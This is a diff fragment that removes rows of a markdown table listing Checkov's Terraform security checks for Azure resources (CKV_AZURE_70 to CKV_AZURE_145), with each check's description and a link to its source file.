-| 1295 | CKV_AZURE_70    | resource | azurerm_linux_function_app                              | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1296 | CKV_AZURE_70    | resource | azurerm_linux_function_app_slot                         | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1297 | CKV_AZURE_70    | resource | azurerm_windows_function_app                            | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1298 | CKV_AZURE_70    | resource | azurerm_windows_function_app_slot                       | Ensure that Function apps is only accessible over HTTPS                                                                                                                                                  | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py)                                                       |
-| 1299 | CKV_AZURE_71    | resource | azurerm_app_service                                     | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1300 | CKV_AZURE_71    | resource | azurerm_linux_web_app                                   | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1301 | CKV_AZURE_71    | resource | azurerm_windows_web_app                                 | Ensure that Managed identity provider is enabled for app services                                                                                                                                        | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py)                                                   |
-| 1302 | CKV_AZURE_72    | resource | azurerm_app_service                                     | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1303 | CKV_AZURE_72    | resource | azurerm_linux_web_app                                   | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1304 | CKV_AZURE_72    | resource | azurerm_windows_web_app                                 | Ensure that remote debugging is not enabled for app services                                                                                                                                             | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py)                                               |
-| 1305 | CKV_AZURE_73    | resource | azurerm_automation_variable_bool                        | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1306 | CKV_AZURE_73    | resource | azurerm_automation_variable_datetime                    | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1307 | CKV_AZURE_73    | resource | azurerm_automation_variable_int                         | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1308 | CKV_AZURE_73    | resource | azurerm_automation_variable_string                      | Ensure that Automation account variables are encrypted                                                                                                                                                   | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py)                                                                               |
-| 1309 | CKV_AZURE_74    | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer (Kusto) uses disk encryption                                                                                                                                             | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py)                                                         |
-| 1310 | CKV_AZURE_75    | resource | azurerm_kusto_cluster                                   | Ensure that Azure Data Explorer uses double encryption                                                                                                                                                   | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py)                                     |
-| 1311 | CKV_AZURE_76    | resource | azurerm_batch_account                                   | Ensure that Azure Batch account uses key vault to encrypt data                                                                                                                                           | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py)                                       |
-| 1312 | CKV_AZURE_77    | resource | azurerm_network_security_group                          | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                 |
-| 1313 | CKV_AZURE_77    | resource | azurerm_network_security_rule                           | Ensure that UDP Services are restricted from the Internet                                                                                                                                                | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py)                                                                 |
-| 1314 | CKV_AZURE_78    | resource | azurerm_app_service                                     | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1315 | CKV_AZURE_78    | resource | azurerm_linux_web_app                                   | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1316 | CKV_AZURE_78    | resource | azurerm_windows_web_app                                 | Ensure FTP deployments are disabled                                                                                                                                                                      | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py)                                                                               |
-| 1317 | CKV_AZURE_79    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for SQL servers on machines                                                                                                                                      | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py)                                                               |
-| 1318 | CKV_AZURE_80    | resource | azurerm_app_service                                     | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                     |
-| 1319 | CKV_AZURE_80    | resource | azurerm_windows_web_app                                 | Ensure that 'Net Framework' version is the latest, if used as a part of the web app                                                                                                                      | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py)                                                     |
-| 1320 | CKV_AZURE_81    | resource | azurerm_app_service                                     | Ensure that 'PHP version' is the latest, if used to run the web app                                                                                                                                      | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py)                                                                             |
-| 1321 | CKV_AZURE_82    | resource | azurerm_app_service                                     | Ensure that 'Python version' is the latest, if used to run the web app                                                                                                                                   | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py)                                                                       |
-| 1322 | CKV_AZURE_83    | resource | azurerm_app_service                                     | Ensure that 'Java version' is the latest, if used to run the web app                                                                                                                                     | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py)                                                                           |
-| 1323 | CKV_AZURE_84    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Storage                                                                                                                                                      | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py)                                                                         |
-| 1324 | CKV_AZURE_85    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Kubernetes                                                                                                                                                   | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py)                                                                   |
-| 1325 | CKV_AZURE_86    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Container Registries                                                                                                                                         | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py)                                                     |
-| 1326 | CKV_AZURE_87    | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender is set to On for Key Vault                                                                                                                                                    | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py)                                                                     |
-| 1327 | CKV_AZURE_88    | resource | azurerm_app_service                                     | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1328 | CKV_AZURE_88    | resource | azurerm_linux_web_app                                   | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1329 | CKV_AZURE_88    | resource | azurerm_windows_web_app                                 | Ensure that app services use Azure Files                                                                                                                                                                 | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py)                                                                     |
-| 1330 | CKV_AZURE_89    | resource | azurerm_redis_cache                                     | Ensure that Azure Cache for Redis disables public network access                                                                                                                                         | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py)                                             |
-| 1331 | CKV_AZURE_91    | resource | azurerm_redis_cache                                     | Ensure that only SSL are enabled for Cache for Redis                                                                                                                                                     | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py)                                                                 |
-| 1332 | CKV_AZURE_92    | resource | azurerm_linux_virtual_machine                           | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                       |
-| 1333 | CKV_AZURE_92    | resource | azurerm_windows_virtual_machine                         | Ensure that Virtual Machines use managed disks                                                                                                                                                           | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py)                                                                                       |
-| 1334 | CKV_AZURE_93    | resource | azurerm_managed_disk                                    | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption                                                                                             | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py)                                                           |
-| 1335 | CKV_AZURE_94    | resource | azurerm_mysql_flexible_server                           | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                           |
-| 1336 | CKV_AZURE_94    | resource | azurerm_mysql_server                                    | Ensure that My SQL server enables geo-redundant backups                                                                                                                                                  | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py)                                                                           |
-| 1337 | CKV_AZURE_95    | resource | azurerm_virtual_machine_scale_set                       | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets                                                                                                                        | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py)                                           |
-| 1338 | CKV_AZURE_96    | resource | azurerm_mysql_server                                    | Ensure that MySQL server enables infrastructure encryption                                                                                                                                               | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py)                                                                         |
-| 1339 | CKV_AZURE_97    | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                   |
-| 1340 | CKV_AZURE_97    | resource | azurerm_windows_virtual_machine_scale_set               | Ensure that Virtual machine scale sets have encryption at host enabled                                                                                                                                   | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py)                                                                   |
-| 1341 | CKV_AZURE_98    | resource | azurerm_container_group                                 | Ensure that Azure Container group is deployed into virtual network                                                                                                                                       | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py)                           |
-| 1342 | CKV_AZURE_99    | resource | azurerm_cosmosdb_account                                | Ensure Cosmos DB accounts have restricted access                                                                                                                                                         | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py)                                                     |
-| 1343 | CKV_AZURE_100   | resource | azurerm_cosmosdb_account                                | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest                                                                                                                        | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py)                                                                                       |
-| 1344 | CKV_AZURE_101   | resource | azurerm_cosmosdb_account                                | Ensure that Azure Cosmos DB disables public network access                                                                                                                                               | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py)                                                           |
-| 1345 | CKV_AZURE_102   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables geo-redundant backups                                                                                                                                              | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py)                                                             |
-| 1346 | CKV_AZURE_103   | resource | azurerm_data_factory                                    | Ensure that Azure Data Factory uses Git repository for source control                                                                                                                                    | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py)                                                             |
-| 1347 | CKV_AZURE_104   | resource | azurerm_data_factory                                    | Ensure that Azure Data factory public network access is disabled                                                                                                                                         | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py)                                                     |
-| 1348 | CKV_AZURE_105   | resource | azurerm_data_lake_store                                 | Ensure that Data Lake Store accounts enables encryption                                                                                                                                                  | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py)                                                                       |
-| 1349 | CKV_AZURE_106   | resource | azurerm_eventgrid_domain                                | Ensure that Azure Event Grid Domain public network access is disabled                                                                                                                                    | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py)                                                             |
-| 1350 | CKV_AZURE_107   | resource | azurerm_api_management                                  | Ensure that API management services use virtual networks                                                                                                                                                 | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py)                                                             |
-| 1351 | CKV_AZURE_108   | resource | azurerm_iothub                                          | Ensure that Azure IoT Hub disables public network access                                                                                                                                                 | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py)                                                                     |
-| 1352 | CKV_AZURE_109   | resource | azurerm_key_vault                                       | Ensure that key vault allows firewall rules settings                                                                                                                                                     | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py)                                             |
-| 1353 | CKV_AZURE_110   | resource | azurerm_key_vault                                       | Ensure that key vault enables purge protection                                                                                                                                                           | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py)                                                         |
-| 1354 | CKV_AZURE_111   | resource | azurerm_key_vault                                       | Ensure that key vault enables soft delete                                                                                                                                                                | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py)                                                                   |
-| 1355 | CKV_AZURE_112   | resource | azurerm_key_vault_key                                   | Ensure that key vault key is backed by HSM                                                                                                                                                               | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py)                                                                                         |
-| 1356 | CKV_AZURE_113   | resource | azurerm_mssql_server                                    | Ensure that SQL server disables public network access                                                                                                                                                    | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py)                                                           |
-| 1357 | CKV_AZURE_114   | resource | azurerm_key_vault_secret                                | Ensure that key vault secrets have "content_type" set                                                                                                                                                    | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py)                                                                                   |
-| 1358 | CKV_AZURE_115   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS enables private clusters                                                                                                                                                                 | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py)                                                                   |
-| 1359 | CKV_AZURE_116   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS uses Azure Policies Add-on                                                                                                                                                               | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py)                                                                   |
-| 1360 | CKV_AZURE_117   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS uses disk encryption set                                                                                                                                                                 | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py)                                                                     |
-| 1361 | CKV_AZURE_118   | resource | azurerm_network_interface                               | Ensure that Network Interfaces disable IP forwarding                                                                                                                                                     | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py)                                                 |
-| 1362 | CKV_AZURE_119   | resource | azurerm_network_interface                               | Ensure that Network Interfaces don't use public IPs                                                                                                                                                      | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml)                                 |
-| 1363 | CKV_AZURE_120   | resource | azurerm_application_gateway                             | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                     |
-| 1364 | CKV_AZURE_120   | resource | azurerm_web_application_firewall_policy                 | Ensure that Application Gateway enables WAF                                                                                                                                                              | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml)                                                     |
-| 1365 | CKV_AZURE_121   | resource | azurerm_frontdoor                                       | Ensure that Azure Front Door enables WAF                                                                                                                                                                 | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py)                                                                     |
-| 1366 | CKV_AZURE_122   | resource | azurerm_web_application_firewall_policy                 | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes                                                                                                                            | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py)                                                                                       |
-| 1367 | CKV_AZURE_123   | resource | azurerm_frontdoor_firewall_policy                       | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes                                                                                                                               | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py)                                                                               |
-| 1368 | CKV_AZURE_124   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search disables public network access                                                                                                                                        | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py)                                         |
-| 1369 | CKV_AZURE_125   | resource | azurerm_service_fabric_cluster                          | Ensures that Service Fabric use three levels of protection available                                                                                                                                     | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py)                                     |
-| 1370 | CKV_AZURE_126   | resource | azurerm_service_fabric_cluster                          | Ensures that Active Directory is used for authentication for Service Fabric                                                                                                                              | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py)                         |
-| 1371 | CKV_AZURE_127   | resource | azurerm_mysql_server                                    | Ensure that My SQL server enables Threat detection policy                                                                                                                                                | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py)                                                                 |
-| 1372 | CKV_AZURE_128   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables Threat detection policy                                                                                                                                            | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py)                                                     |
-| 1373 | CKV_AZURE_129   | resource | azurerm_mariadb_server                                  | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py)                                                                       |
-| 1374 | CKV_AZURE_130   | resource | azurerm_postgresql_server                               | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py)                                                               |
-| 1375 | CKV_AZURE_131   | resource | azurerm_security_center_contact                         | Ensure that 'Security contact emails' is set                                                                                                                                                             | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py)                                                               |
-| 1376 | CKV_AZURE_132   | resource | azurerm_cosmosdb_account                                | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py)                                                           |
-| 1377 | CKV_AZURE_133   | resource | azurerm_frontdoor_firewall_policy                       | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py)                                                               |
-| 1378 | CKV_AZURE_134   | resource | azurerm_cognitive_account                               | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py)                                         |
-| 1379 | CKV_AZURE_135   | resource | azurerm_web_application_firewall_policy                 | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py)                                                             |
-| 1380 | CKV_AZURE_136   | resource | azurerm_postgresql_flexible_server                      | Ensure that PostgreSQL Flexible server enables geo-redundant backups                                                                                                                                     | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py)                                           |
-| 1381 | CKV_AZURE_137   | resource | azurerm_container_registry                              | Ensure ACR admin account is disabled                                                                                                                                                                     | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py)                                                                       |
-| 1382 | CKV_AZURE_138   | resource | azurerm_container_registry                              | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py)                                                                     |
-| 1383 | CKV_AZURE_139   | resource | azurerm_container_registry                              | Ensure ACR set to disable public networking                                                                                                                                                              | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py)                                                         |
-| 1384 | CKV_AZURE_140   | resource | azurerm_cosmosdb_account                                | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py)                                                                   |
-| 1385 | CKV_AZURE_141   | resource | azurerm_kubernetes_cluster                              | Ensure AKS local admin account is disabled                                                                                                                                                               | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py)                                                                           |
-| 1386 | CKV_AZURE_142   | resource | azurerm_machine_learning_compute_cluster                | Ensure Machine Learning Compute Cluster Local Authentication is disabled                                                                                                                                 | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py)                                                                                         |
-| 1387 | CKV_AZURE_143   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster nodes do not have public IP addresses                                                                                                                                                 | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py)                                                                       |
-| 1388 | CKV_AZURE_144   | resource | azurerm_machine_learning_workspace                      | Ensure that Public Access is disabled for Machine Learning Workspace                                                                                                                                     | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py)                                                                                         |
-| 1389 | CKV_AZURE_145   | resource | azurerm_function_app                                    | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
